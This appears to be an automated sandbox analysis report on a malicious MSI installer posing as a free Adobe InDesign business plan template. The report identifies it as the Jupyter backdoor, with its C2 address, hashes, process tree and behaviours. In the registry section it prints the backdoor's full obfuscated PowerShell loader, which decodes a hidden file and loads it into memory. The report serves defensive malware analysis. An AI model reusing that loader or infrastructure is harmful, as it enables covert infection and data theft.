Analysis
max time kernel: 146s
max time network: 148s
platform: windows7_x64
resource: win7v20210408
submitted: 02-10-2021 16:02
Static task: static1
Behavioral task: behavioral1
Sample: Adobe-Indesign-Business-Plan-Template-Free.msi
Resource: win7v20210408 (windows7_x64)
0 signatures
0 seconds
General
Target: Adobe-Indesign-Business-Plan-Template-Free.msi
Size: 108.5MB
MD5: 82dbf0d2b49de42dc700df7c96b41eb1
SHA1: 509c08fd9805cf2034fec547c0fc962423a96a3b
SHA256: 7ada6e666c34aacaf7c93d11ca2e563ec53da37fb23a181631809d0d5ef14387
SHA512: 3d256fba291eb2f4a81ef53d8db8a333f3fb26a9a2c90e3c28bb0a944dc8bba2a2c8902232b14e6a9debdf93a2ff100faabb2be2053aac7fc2ccbdbd2f98fc83
Malware Config
Extracted
Family: jupyter
Version: SP-18
C2: http://188.241.83.61
Signatures
Jupyter Backdoor/Client Payload 1 IoCs
  resource: behavioral1/memory/1944-125-0x0000000006410000-0x000000000641B000-memory.dmp  yara_rule: family_jupyter
Blocklisted process makes network request 3 IoCs
  flow 2  pid 1840  msiexec.exe
  flow 4  pid 1840  msiexec.exe
  flow 9  pid 1944  powershell.exe
Executes dropped EXE 2 IoCs
  pid 1436  MSI8937.tmp
  pid 472   MSI8937.tmp
Drops startup file 1 IoCs
  File created  C:\Users\Admin\AppData\Roaming\MicroSOft\winDOWs\sTARt mENu\ProgRAMs\sTArtup\a96fb6f8b754c29c11d545ae7280e.Lnk  powershell.exe
Loads dropped DLL 12 IoCs
  pid 1376  MsiExec.exe
  pid 1436  MSI8937.tmp
  pid 472   MSI8937.tmp (10 entries)
Checks installed software on the system 1 TTPs
  Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives 3 TTPs 48 IoCs
  Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by msiexec.exe: \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: (each of these 24 paths is recorded twice, 48 entries in total; C: and D: do not appear)
Drops file in System32 directory 1 IoCs
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
Modifies registry class 7 IoCs
  Key created  \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy\shell\open\command  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy\shell  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy\shell\open  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy\shell\open\command\ = "POWerShELl -wiNdowstylE HiDdeN -Ep byPAsS -COmMANd \"$a430d21fc7e4e5a384e68ec12d657='XjB8PD1eMFMoeV5ucnQqXjA8WUJAd3VnOz80TyRScyt4JU5tNyRzT3JpNz5TeU5SUm5qR2x6P3QpUXs8ayo5KDFueXNfKG4yKE99cXFuQ0B3dkxOQH05ZShAfSNBbEBVXnZ+QHxCTDZAdE1FMkB7KWp6Xk41QTFAfkVBckBzWWYjQFJOellAViRoJV5SSzEzQHs1SWxAclMqKkBVKlhtQHM1TyVAUllFb0BVZllNXlIxdGJAfjQtS0BxeGFpQFQjcSNeUiV0NEBgSW5mXk99YUFAfHYlWEBzeSNjXm5rZ20=';$aac234a2d4c4f3b635d4a3f5d61f8=[SyStem.Io.fILe]::reAdAllByTEs('C:\\Users\\Admin\\AppData\\Roaming\\micROSoft\\XlntuRpqvyOUsFIe\\qBxYPsdlOM.KezFwNmOtpHuXQsicPB');foR($a5722f7abb246584cc4eb2637a436=0;$a5722f7abb246584cc4eb2637a436 -LT $aac234a2d4c4f3b635d4a3f5d61f8.couNT;){fOR($a227219ce164ea81bcf7b1c4a47ef=0;$a227219ce164ea81bcf7b1c4a47ef -Lt $a430d21fc7e4e5a384e68ec12d657.lenGTH;$a227219ce164ea81bcf7b1c4a47ef++){$aac234a2d4c4f3b635d4a3f5d61f8[$a5722f7abb246584cc4eb2637a436]=$aac234a2d4c4f3b635d4a3f5d61f8[$a5722f7abb246584cc4eb2637a436] -BxOr $a430d21fc7e4e5a384e68ec12d657[$a227219ce164ea81bcf7b1c4a47ef];$a5722f7abb246584cc4eb2637a436++;IF($a5722f7abb246584cc4eb2637a436 -GE $aac234a2d4c4f3b635d4a3f5d61f8.COUNt){$a227219ce164ea81bcf7b1c4a47ef=$a430d21fc7e4e5a384e68ec12d657.LENgTH}}};[sYSTem.rEFLectIOn.assEmBLY]::lOaD($aac234a2d4c4f3b635d4a3f5d61f8);[ab821408b424418fa94bb4d815b4e.ad0682a943e4859ef35309cc0a537]::a1f5abfa214411baa77e25f6ceaa6()\""  powershell.exe
  Key created  \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\.lqpevyfcou  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\.lqpevyfcou\ = "azoklbsdopsdwy"  powershell.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
  pid 1944  powershell.exe (64 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
  pid 1840  msiexec.exe  Token: SeShutdownPrivilege, SeIncreaseQuotaPrivilege
  pid 1260  msiexec.exe  Token: SeRestorePrivilege, SeTakeOwnershipPrivilege, SeSecurityPrivilege
  pid 1840  msiexec.exe  Token: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege (this sequence of 29 tokens is recorded twice, followed by SeCreateTokenPrivilege once more; 64 entries in total)
Suspicious use of FindShellTrayWindow 1 IoCs
  pid 1840  msiexec.exe
Suspicious use of WriteProcessMemory 25 IoCs
  PID 1260 wrote to memory of 1376  pid 1260  msiexec.exe   procid_target 26  (7 entries)
  PID 1840 wrote to memory of 1436  pid 1840  msiexec.exe   procid_target 27  (7 entries)
  PID 1376 wrote to memory of 1944  pid 1376  MsiExec.exe   procid_target 28  (4 entries)
  PID 1436 wrote to memory of 472   pid 1436  MSI8937.tmp   procid_target 30  (7 entries)
Processes
C:\Windows\system32\msiexec.exe
  command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Adobe-Indesign-Business-Plan-Template-Free.msi
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID: 1840
  C:\Users\Admin\AppData\Local\Temp\MSI8937.tmp
    command line: "C:\Users\Admin\AppData\Local\Temp\MSI8937.tmp"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 1436
    C:\Windows\Temp\{546D6E0B-7BE4-4839-901B-65B90D9BCC36}\.cr\MSI8937.tmp
      command line: "C:\Windows\Temp\{546D6E0B-7BE4-4839-901B-65B90D9BCC36}\.cr\MSI8937.tmp" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\MSI8937.tmp" -burn.filehandle.attached=180 -burn.filehandle.self=188
      - Executes dropped EXE
      - Loads dropped DLL
      PID: 472
C:\Windows\system32\msiexec.exe
  command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1260
  C:\Windows\syswow64\MsiExec.exe
    command line: C:\Windows\syswow64\MsiExec.exe -Embedding D0B6FCDC0E17D0F8916305DF87B54653 C
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 1376
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8E6C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8E3A.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8E3B.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8E3C.txt" -propSep " :<->: " -testPrefix "_testValue."
      - Blocklisted process makes network request
      - Drops startup file
      - Drops file in System32 directory
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      PID: 1944